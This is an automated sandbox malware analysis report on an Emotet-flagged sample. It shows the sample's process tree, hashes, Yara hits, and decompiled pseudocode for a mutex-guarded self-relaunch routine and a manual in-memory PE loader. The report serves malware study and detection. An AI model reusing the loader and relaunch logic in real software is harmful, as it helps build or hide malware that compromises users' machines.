Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.640361081.0000000001381000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000000.633157257.0000000001381000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: storageservice.exe PID: 6812 Parent PID: 568

General

Start time:	18:47:48
Start date:	10/04/2021
Path:	C:\Windows\SysWOW64\storageservice.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\storageservice.exe
Imagebase:	0x1380000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000000.638984509.0000000001381000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.640209506.0000000001381000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: storageservice.exe PID: 6828 Parent PID: 6812

General

Start time:	18:47:48
Start date:	10/04/2021
Path:	C:\Windows\SysWOW64\storageservice.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\storageservice.exe
Imagebase:	0x1380000
File size:	45568 bytes
MD5 hash:	ECBC4B40DCFEC4ED1B2647B217DA0441
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000000.639793428.0000000001381000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.898946523.0000000001381000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 4800 Parent PID: 568

General

Start time:	18:49:17
Start date:	10/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5688 Parent PID: 568

General

Start time:	18:49:35
Start date:	10/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6352 Parent PID: 568

General

Start time:	18:49:49
Start date:	10/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: zeD11Fztx8.exe PID: 6720 Parent PID: 5256 zeD11Fztx8.exeCOMMON

Execution Graph

Execution Coverage:	0.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.2%
Total number of Nodes:	531
Total number of Limit Nodes:	3

Executed Functions

Function 013815B0, Relevance: 38.6, APIs: 21, Strings: 1, Instructions: 133
memorysynchronizationprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E013815B0(void* __ebx) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v220;
				short _v348;
				short _v868;
				intOrPtr* _t23;
				void* _t40;
				int _t47;
				WCHAR* _t61;
				void* _t64;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;

				GetModuleFileNameW(0,  &_v868, 0x104);
				_t61 =  &_v868;
				_t23 = E013819E0(_t61);
				 *((intOrPtr*)(__ebx + 0x4baf8)) =  *((intOrPtr*)(__ebx + 0x4baf8)) + _t61;
				 *_t23 =  *_t23 + _t23;
				E01381830(0x1381004, _t64, 0x4dbac13f,  &_v8);
				_t68 = _v8;
				 *0x138c200( &_v348, 0x40, _t68, _t66);
				HeapFree(GetProcessHeap(), 0, _t68);
				E01381830(0x1381000, 4, 0x4dbac13f,  &_v8);
				_t69 = _v8;
				 *0x138c200( &_v220, 0x40, _t69, _t66);
				HeapFree(GetProcessHeap(), 0, _t69);
				_t70 = CreateEventW(0, 1, 0,  &_v348);
				if(_t70 == 0) {
					L4:
					return 0;
				} else {
					_t40 = CreateMutexW(0, 1,  &_v220); // executed
					_t67 = _t40;
					if(_t67 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v92, 0, 0x44);
							_v92.cb = 0x44;
							_v92.dwFlags = 0x80;
							_t47 = CreateProcessW( &_v868, 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24); // executed
							if(_t47 == 0) {
								goto L4;
							} else {
								WaitForSingleObject(_t70, 0xffffffff);
								CloseHandle(_v24);
								CloseHandle(_v24.hThread);
								CloseHandle(_t70);
								CloseHandle(_t67);
								return 1;
							}
						} else {
							SetEvent(_t70);
							CloseHandle(_t70);
							CloseHandle(_t67);
							E01389C50(0x1381000);
							return 1;
						}
					} else {
						CloseHandle(_t70);
						goto L4;
					}
				}
			}

0x013815c9
0x013815cf
0x013815d5
0x013815d9
0x013815df
0x013815ef
0x013815f4
0x01381602
0x01381615
0x0138162e
0x01381633
0x01381641
0x01381654
0x0138166d
0x01381671
0x01381692
0x01381698
0x01381673
0x0138167e
0x01381684
0x01381688
0x013816a4
0x013816d3
0x013816dc
0x013816e6
0x01381707
0x0138170f
0x00000000
0x01381711
0x01381714
0x0138171d
0x01381726
0x0138172d
0x01381734
0x01381744
0x01381744
0x013816a6
0x013816a7
0x013816ae
0x013816b5
0x013816bb
0x013816ca
0x013816ca
0x0138168a
0x0138168b
0x00000000
0x0138168b
0x01381688

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 013815C9

Part of subcall function 01381830: GetProcessHeap.KERNEL32(00000008,01389F6B,00000000,00000000,01381004,?,013815F4,4DBAC13F,01389F6B,?,00000000), ref: 01381844
Part of subcall function 01381830: RtlAllocateHeap.NTDLL(00000000,?,013815F4), ref: 0138184B

_snwprintf.NTDLL ref: 01381602
GetProcessHeap.KERNEL32(00000000,01389F6B), ref: 0138160E
HeapFree.KERNEL32(00000000), ref: 01381615
_snwprintf.NTDLL ref: 01381641
GetProcessHeap.KERNEL32(00000000,01389F6B), ref: 0138164D
HeapFree.KERNEL32(00000000), ref: 01381654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 01381667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0138167E
CloseHandle.KERNEL32(00000000), ref: 0138168B
GetLastError.KERNEL32 ref: 01381699
SetEvent.KERNEL32(00000000), ref: 013816A7
CloseHandle.KERNEL32(00000000), ref: 013816AE
CloseHandle.KERNEL32(00000000), ref: 013816B5
memset.NTDLL ref: 013816D3
CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 01381707
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01381714
CloseHandle.KERNEL32(?), ref: 0138171D
CloseHandle.KERNEL32(?), ref: 01381726
CloseHandle.KERNEL32(00000000), ref: 0138172D
CloseHandle.KERNEL32(00000000), ref: 01381734

Strings

D, xrefs: 013816DC

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: CloseHandle$Heap$Process$Create$EventFree_snwprintf$AllocateErrorFileLastModuleMutexNameObjectSingleWaitmemset
String ID: D
API String ID: 2830143876-2746444292
Opcode ID: f417b767315e65e855c5565859d1b3f12ce1b7508597f69a8f3ce58494160c11
Instruction ID: 0ca15fab0d10fd86254ffa4388413487cecc58299c8af1e73b4b0160c4330919
Opcode Fuzzy Hash: f417b767315e65e855c5565859d1b3f12ce1b7508597f69a8f3ce58494160c11
Instruction Fuzzy Hash: 04418F71900219ABEB20ABA4EC8DFEE7B7CFB44716F040051FA09E6184DB749A458BB5

Uniqueness

Uniqueness Score: -1.00%

Function 01381599, Relevance: 15.1, APIs: 10, Instructions: 86
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E01381599(signed int __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __esi, void* __fp0) {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v220;
				short _v348;
				short _v868;
				short _v876;
				intOrPtr* _t27;
				void* _t44;
				int _t51;
				WCHAR* _t66;
				void* _t71;
				intOrPtr _t73;
				void* _t75;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t85;
				intOrPtr* _t90;

				asm("daa");
				_t71 = __edx -  *_t90;
				asm("salc");
				 *((intOrPtr*)(__esi + 2)) =  *((intOrPtr*)(__esi + 2)) + (__eax | 0x0000004a);
				_t73 =  *__ecx;
				GetModuleFileNameW(0,  &_v876, 0x104);
				_t66 =  &_v876;
				_t27 = E013819E0(_t66);
				 *((intOrPtr*)(__ebx + 0x4baf8)) =  *((intOrPtr*)(__ebx + 0x4baf8)) + _t66;
				 *_t27 =  *_t27 + _t27;
				E01381830(0x1381004, _t71, 0x4dbac13f,  &_v8);
				_t79 = _v8;
				 *0x138c200( &_v348, 0x40, _t79, _t73, _t73, __esi, _t85, _t90, cs);
				HeapFree(GetProcessHeap(), 0, _t79);
				E01381830(0x1381000, 4, 0x4dbac13f,  &_v8);
				_t80 = _v8;
				 *0x138c200( &_v220, 0x40, _t80, _t73);
				HeapFree(GetProcessHeap(), 0, _t80);
				_t81 = CreateEventW(0, 1, 0,  &_v348);
				if(_t81 == 0) {
					L5:
					return 0;
				} else {
					_t44 = CreateMutexW(0, 1,  &_v220); // executed
					_t75 = _t44;
					if(_t75 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v92, 0, 0x44);
							_v92.cb = 0x44;
							_v92.dwFlags = 0x80;
							_t51 = CreateProcessW( &_v868, 0, 0, 0, 0, 0, 0, 0,  &_v92,  &_v24); // executed
							if(_t51 == 0) {
								goto L5;
							} else {
								WaitForSingleObject(_t81, 0xffffffff);
								CloseHandle(_v24);
								CloseHandle(_v24.hThread);
								CloseHandle(_t81);
								CloseHandle(_t75);
								return 1;
							}
						} else {
							SetEvent(_t81);
							CloseHandle(_t81);
							CloseHandle(_t75);
							E01389C50(0x1381000);
							return 1;
						}
					} else {
						CloseHandle(_t81);
						goto L5;
					}
				}
			}

0x01381599
0x0138159d
0x013815a5
0x013815a6
0x013815a9
0x013815c9
0x013815cf
0x013815d5
0x013815d9
0x013815df
0x013815ef
0x013815f4
0x01381602
0x01381615
0x0138162e
0x01381633
0x01381641
0x01381654
0x0138166d
0x01381671
0x01381691
0x01381698
0x01381673
0x0138167e
0x01381684
0x01381688
0x013816a4
0x013816d3
0x013816dc
0x013816e6
0x01381707
0x0138170f
0x00000000
0x01381711
0x01381714
0x0138171d
0x01381726
0x0138172d
0x01381734
0x01381744
0x01381744
0x013816a6
0x013816a7
0x013816ae
0x013816b5
0x013816bb
0x013816ca
0x013816ca
0x0138168a
0x0138168b
0x00000000
0x0138168b
0x01381688

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 013815C9

Part of subcall function 01381830: GetProcessHeap.KERNEL32(00000008,01389F6B,00000000,00000000,01381004,?,013815F4,4DBAC13F,01389F6B,?,00000000), ref: 01381844
Part of subcall function 01381830: RtlAllocateHeap.NTDLL(00000000,?,013815F4), ref: 0138184B

_snwprintf.NTDLL ref: 01381602
GetProcessHeap.KERNEL32(00000000,01389F6B), ref: 0138160E
HeapFree.KERNEL32(00000000), ref: 01381615
_snwprintf.NTDLL ref: 01381641
GetProcessHeap.KERNEL32(00000000,01389F6B), ref: 0138164D
HeapFree.KERNEL32(00000000), ref: 01381654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 01381667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0138167E
CloseHandle.KERNEL32(00000000), ref: 0138168B
GetLastError.KERNEL32 ref: 01381699
SetEvent.KERNEL32(00000000), ref: 013816A7
CloseHandle.KERNEL32(00000000), ref: 013816AE
CloseHandle.KERNEL32(00000000), ref: 013816B5

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandleProcess$CreateEventFree_snwprintf$AllocateErrorFileLastModuleMutexName
String ID:
API String ID: 4183562332-0
Opcode ID: e1c8bf82618cf8aa4f923960bf37800a325d71516d9d37241a2345dfa7cdbe36
Instruction ID: 06634eb76c0ee9f94a11593721853fb87829af7bd8f6b12ea592252a6ed68e83
Opcode Fuzzy Hash: e1c8bf82618cf8aa4f923960bf37800a325d71516d9d37241a2345dfa7cdbe36
Instruction Fuzzy Hash: 6F21D371640205BFEB20ABA4DC4AFDE3B7DEB80716F044081FA08E6184CA309A468BA0

Uniqueness

Uniqueness Score: -1.00%

Function 01381575, Relevance: 13.6, APIs: 9, Instructions: 73
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E01381575(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __fp0) {
				void* _v4;
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				short _v216;
				short _v344;
				short _v864;
				void* _v880;
				signed char _t34;
				void* _t51;
				int _t58;
				signed char _t71;
				signed char _t73;
				void* _t78;
				void* _t79;
				void* _t82;
				void* _t84;
				signed char _t87;
				void* _t89;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t105;
				void* _t127;

				L0:
				while(1) {
					_t84 = __edx;
					_t79 = __ecx;
					_t78 = __ebx;
					_t127 = __fp0 -  *[fs:edx];
					_t34 = __eax + 0x527dd026 | 0x0000004a;
					asm("fistp qword [ecx+ebx]");
					if(__ecx >= _t34) {
						break;
					}
					L14:
					_t127 = _t127 -  *[fs:edx];
					_t71 = _t73 | 0x0000004a;
					asm("retf");
					_t79 = _t82 - _t105;
					asm("daa");
					_push(__ebx);
					if (_t79 < 0) goto L5;
					L15:
					_t87 = _t71;
				}
				L19:
				 *((intOrPtr*)(_t78 + 0x4baf8)) =  *((intOrPtr*)(_t78 + 0x4baf8)) + _t79;
				 *_t34 =  *_t34 + _t34;
				E01381830(0x1381004, _t84, 0x4dbac13f,  &_v4);
				_t95 = _v4;
				 *0x138c200( &_v344, 0x40, _t95, _t89);
				HeapFree(GetProcessHeap(), 0, _t95);
				E01381830(0x1381000, 4, 0x4dbac13f,  &_v4);
				_t96 = _v4;
				 *0x138c200( &_v216, 0x40, _t96, _t89);
				HeapFree(GetProcessHeap(), 0, _t96);
				_t97 = CreateEventW(0, 1, 0,  &_v344);
				if(_t97 == 0) {
					L22:
					return 0;
				} else {
					_t51 = CreateMutexW(0, 1,  &_v216); // executed
					_t91 = _t51;
					if(_t91 != 0) {
						if(GetLastError() != 0xb7) {
							memset( &_v88, 0, 0x44);
							_v88.cb = 0x44;
							_v88.dwFlags = 0x80;
							_t58 = CreateProcessW( &_v864, 0, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20); // executed
							if(_t58 == 0) {
								goto L22;
							} else {
								WaitForSingleObject(_t97, 0xffffffff);
								CloseHandle(_v20);
								CloseHandle(_v20.hThread);
								CloseHandle(_t97);
								CloseHandle(_t91);
								return 1;
							}
						} else {
							SetEvent(_t97);
							CloseHandle(_t97);
							CloseHandle(_t91);
							E01389C50(0x1381000);
							return 1;
						}
					} else {
						CloseHandle(_t97);
						goto L22;
					}
				}
			}

0x01381575
0x01381575
0x01381575
0x01381575
0x01381575
0x0138157b
0x0138157e
0x01381580
0x01381585
0x00000000
0x00000000
0x01381587
0x01381587
0x0138158a
0x0138158c
0x0138158f
0x01381591
0x01381592
0x01381593
0x01381594
0x01381594
0x01381594
0x013815d9
0x013815d9
0x013815df
0x013815ef
0x013815f4
0x01381602
0x01381615
0x0138162e
0x01381633
0x01381641
0x01381654
0x0138166d
0x01381671
0x01381691
0x01381698
0x01381673
0x0138167e
0x01381684
0x01381688
0x013816a4
0x013816d3
0x013816dc
0x013816e6
0x01381707
0x0138170f
0x00000000
0x01381711
0x01381714
0x0138171d
0x01381726
0x0138172d
0x01381734
0x01381744
0x01381744
0x013816a6
0x013816a7
0x013816ae
0x013816b5
0x013816bb
0x013816ca
0x013816ca
0x0138168a
0x0138168b
0x00000000
0x0138168b
0x01381688

APIs

_snwprintf.NTDLL ref: 01381602
GetProcessHeap.KERNEL32(00000000,01389F6B), ref: 0138160E
HeapFree.KERNEL32(00000000), ref: 01381615
_snwprintf.NTDLL ref: 01381641
GetProcessHeap.KERNEL32(00000000,01389F6B), ref: 0138164D
HeapFree.KERNEL32(00000000), ref: 01381654
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 01381667
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0138167E
CloseHandle.KERNEL32(00000000), ref: 0138168B

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcess_snwprintf$CloseEventHandleMutex
String ID:
API String ID: 2595929981-0
Opcode ID: 433d20031fa52916c380d02fe48128f6c35f6e5e48bb51b61724f9eb80f6c0bb
Instruction ID: 34cb7cce5e7594bba70b648ae5e7e674ff2ae5179e7599320fdafe1fca924b0e
Opcode Fuzzy Hash: 433d20031fa52916c380d02fe48128f6c35f6e5e48bb51b61724f9eb80f6c0bb
Instruction Fuzzy Hash: BD21D571A04355AFEF31ABA59C49FDE3B7CEF81715F040091FA08EB281CA308A468B71

Uniqueness

Uniqueness Score: -1.00%

Function 01389EE0, Relevance: 9.0, APIs: 6, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t6;
				void* _t11;
				void* _t18;

				E01381B10(E01381BE0(0xd22e2014), 0x13811f0, 9, 0x3966646c, 0x138c1f0);
				E01381B10(E01381BE0(0x8f7ee672), 0x13810d0, 0x48, 0x6677a1d2, 0x138c0d0);
				_t6 = RtlAllocateHeap(GetProcessHeap(), 0, 0x8000000); // executed
				_t18 = _t6;
				if(_t18 != 0) {
					memset(_t18, 0, 0x8000000);
					RtlFreeHeap(GetProcessHeap(), 0, _t18); // executed
					E013815B0(_t11); // executed
				}
				ExitProcess(0);
			}

0x01389efe
0x01389f23
0x01389f39
0x01389f3f
0x01389f43
0x01389f4d
0x01389f60
0x01389f66
0x01389f66
0x01389f6d

APIs

GetProcessHeap.KERNEL32(00000000,08000000), ref: 01389F32
RtlAllocateHeap.NTDLL(00000000), ref: 01389F39
memset.NTDLL ref: 01389F4D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01389F59
RtlFreeHeap.NTDLL(00000000), ref: 01389F60

Part of subcall function 013815B0: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 013815C9
Part of subcall function 013815B0: _snwprintf.NTDLL ref: 01381602
Part of subcall function 013815B0: GetProcessHeap.KERNEL32(00000000,01389F6B), ref: 0138160E
Part of subcall function 013815B0: HeapFree.KERNEL32(00000000), ref: 01381615
Part of subcall function 013815B0: _snwprintf.NTDLL ref: 01381641
Part of subcall function 013815B0: GetProcessHeap.KERNEL32(00000000,01389F6B), ref: 0138164D
Part of subcall function 013815B0: HeapFree.KERNEL32(00000000), ref: 01381654
Part of subcall function 013815B0: CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 01381667
Part of subcall function 013815B0: CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 0138167E
Part of subcall function 013815B0: CloseHandle.KERNEL32(00000000), ref: 0138168B

ExitProcess.KERNEL32 ref: 01389F6D

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Create_snwprintf$AllocateCloseEventExitFileHandleModuleMutexNamememset
String ID:
API String ID: 871367918-0
Opcode ID: b3f0213c0bdf6bda41b205d5e3970cc7be6a8c11402c8057db4603c4a09763e7
Instruction ID: 14b9bfa49444ca934a4ae8f3f5d806ca51bf5bbdba4939960029644edc211cc7
Opcode Fuzzy Hash: b3f0213c0bdf6bda41b205d5e3970cc7be6a8c11402c8057db4603c4a09763e7
Instruction Fuzzy Hash: 49F096707803017FF97533B96C2EF8F39195B50B8EF205410F606AA6CAEE61480247B9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01381F40, Relevance: 9.2, APIs: 6, Instructions: 163
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01381F40(void* __ecx, void* __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				struct HINSTANCE__* _v20;
				intOrPtr _t55;
				struct HINSTANCE__* _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed short _t65;
				CHAR* _t68;
				_Unknown_base(*)()* _t69;
				intOrPtr* _t70;
				signed int _t71;
				void* _t79;
				intOrPtr _t81;
				struct HINSTANCE__* _t82;
				void* _t85;
				intOrPtr _t86;
				signed short* _t89;
				void* _t90;
				intOrPtr* _t91;
				_Unknown_base(*)()** _t93;
				void* _t96;
				intOrPtr* _t99;
				void* _t102;
				intOrPtr* _t104;
				signed short* _t106;
				void* _t108;
				void* _t109;
				signed short _t128;

				_t79 = 0;
				_t90 = __ecx;
				if(__edx <= 0x40 ||  *((intOrPtr*)(__ecx)) != 0x5a4d) {
					L33:
					return _t79;
				} else {
					_t99 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
					_v8 = _t99;
					if( *_t99 != 0x4550 ||  *((intOrPtr*)(_t99 + 0x18)) != 0x10b) {
						L32:
						goto L33;
					} else {
						_t79 = VirtualAlloc(0,  *(_t99 + 0x50), 0x3000, 0x40);
						if(_t79 != 0) {
							memcpy(_t79, _t90,  *(_t99 + 0x54));
							_t109 = _t108 + 0xc;
							_t81 = _v8;
							_t102 = _t99 + 0x18 + ( *(_t99 + 0x14) & 0x0000ffff);
							_t55 = _t102 + (( *(_t81 + 6) & 0x0000ffff) + ( *(_t81 + 6) & 0x0000ffff) * 4) * 8;
							_v12 = _t55;
							if(_t102 < _t55) {
								do {
									_t86 =  *((intOrPtr*)(_t102 + 0x10));
									_t87 =  <  ?  *((void*)(_t102 + 8)) : _t86;
									memcpy( *((intOrPtr*)(_t102 + 0xc)) + _t79,  *((intOrPtr*)(_t102 + 0x14)) + _t90,  <  ?  *((void*)(_t102 + 8)) : _t86);
									_t102 = _t102 + 0x28;
									_t109 = _t109 + 0xc;
								} while (_t102 < _v12);
								_t81 = _v8;
							}
							_t104 =  *((intOrPtr*)(_t81 + 0xa0)) + _t79;
							_v12 = _t79 -  *((intOrPtr*)(_t81 + 0x34));
							_t59 =  *((intOrPtr*)(_t81 + 0xa4)) + _t104;
							_v20 = _t59;
							if(_t104 < _t59) {
								do {
									_t70 = _t104 + 4;
									_t96 =  *((intOrPtr*)(_t104 + 4)) + _t104;
									_v16 = _t70;
									_t89 = _t104 + 8;
									if(_t89 < _t96) {
										do {
											_t71 =  *_t89 & 0x0000ffff;
											_t85 = (_t71 & 0x00000fff) +  *_t104;
											if((_t71 & 0x0000f000) == 0x3000) {
												 *((intOrPtr*)(_t85 + _t79)) =  *((intOrPtr*)(_t85 + _t79)) + _v12;
											}
											_t89 =  &(_t89[1]);
										} while (_t89 < _t96);
										_t70 = _v16;
									}
									_t104 = _t104 +  *_t70;
								} while (_t104 < _v20);
								_t81 = _v8;
							}
							_t60 =  *((intOrPtr*)(_t81 + 0x80));
							if(_t60 != 0 &&  *((intOrPtr*)(_t81 + 0x84)) != 0) {
								_t91 = _t60 + _t79;
								_t61 =  *((intOrPtr*)(_t91 + 0xc));
								_v8 = _t91;
								if(_t61 != 0) {
									while(1) {
										_t82 = LoadLibraryA(_t61 + _t79);
										_v20 = _t82;
										if(_t82 == 0) {
											break;
										}
										_t106 =  *_t91 + _t79;
										_t93 =  *((intOrPtr*)(_t91 + 0x10)) + _t79;
										_t65 =  *_t106;
										_t128 = _t65;
										if(_t128 == 0) {
											L29:
											_t91 = _v8 + 0x14;
											_v8 = _t91;
											_t61 =  *((intOrPtr*)(_t91 + 0xc));
											if(_t61 != 0) {
												continue;
											} else {
												return _t79;
											}
										} else {
											L24:
											L24:
											if(_t128 >= 0) {
												_t68 = _t65 + 2 + _t79;
											} else {
												_t68 = _t65 & 0x0000ffff;
											}
											_t69 = GetProcAddress(_t82, _t68);
											if(_t69 == 0) {
												break;
											}
											_t82 = _v20;
											_t106 =  &(_t106[2]);
											 *_t93 = _t69;
											_t93 = _t93 + 4;
											_t65 =  *_t106;
											if(_t65 != 0) {
												goto L24;
											} else {
												goto L29;
											}
										}
										goto L34;
									}
									VirtualFree(_t79, 0, 0x8000);
									_t79 = 0;
								}
							}
						}
						goto L32;
					}
				}
				L34:
			}

0x01381f47
0x01381f4a
0x01381f4f
0x01382105
0x0138210b
0x01381f63
0x01381f67
0x01381f69
0x01381f72
0x01382103
0x00000000
0x01381f87
0x01381f98
0x01381f9c
0x01381fa7
0x01381fb1
0x01381fb4
0x01381fba
0x01381fc3
0x01381fc6
0x01381fcb
0x01381fd0
0x01381fd0
0x01381fd9
0x01381fe7
0x01381fed
0x01381ff0
0x01381ff3
0x01381ff8
0x01381ff8
0x01382006
0x01382008
0x01382011
0x01382013
0x01382018
0x01382020
0x01382023
0x01382026
0x01382028
0x0138202b
0x01382030
0x01382032
0x01382032
0x01382042
0x01382049
0x0138204e
0x0138204e
0x01382051
0x01382054
0x01382058
0x01382058
0x0138205b
0x0138205d
0x01382062
0x01382062
0x01382065
0x0138206d
0x01382080
0x01382083
0x01382086
0x0138208b
0x01382090
0x01382099
0x0138209b
0x013820a0
0x00000000
0x00000000
0x013820a7
0x013820a9
0x013820ab
0x013820ad
0x013820af
0x013820da
0x013820dd
0x013820e0
0x013820e3
0x013820e8
0x00000000
0x013820ea
0x013820f2
0x013820f2
0x013820b1
0x00000000
0x013820b1
0x013820b1
0x013820bb
0x013820b3
0x013820b3
0x013820b3
0x013820bf
0x013820c7
0x00000000
0x00000000
0x013820c9
0x013820cc
0x013820cf
0x013820d1
0x013820d4
0x013820d8
0x00000000
0x00000000
0x00000000
0x00000000
0x013820d8
0x00000000
0x013820af
0x013820fb
0x01382101
0x01382101
0x0138208b
0x0138206d
0x00000000
0x01381f9c
0x01381f72
0x00000000

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,00000000,00000080,01388A23,?,000DBBA0), ref: 01381F92
memcpy.NTDLL(00000000,?,?,?,000DBBA0,?,?,?,?,?,?,?,01388F82), ref: 01381FA7
memcpy.NTDLL(?,?,?), ref: 01381FE7
LoadLibraryA.KERNEL32(01388F82), ref: 01382093
GetProcAddress.KERNEL32(00000000,-00000002), ref: 013820BF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013820FB

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
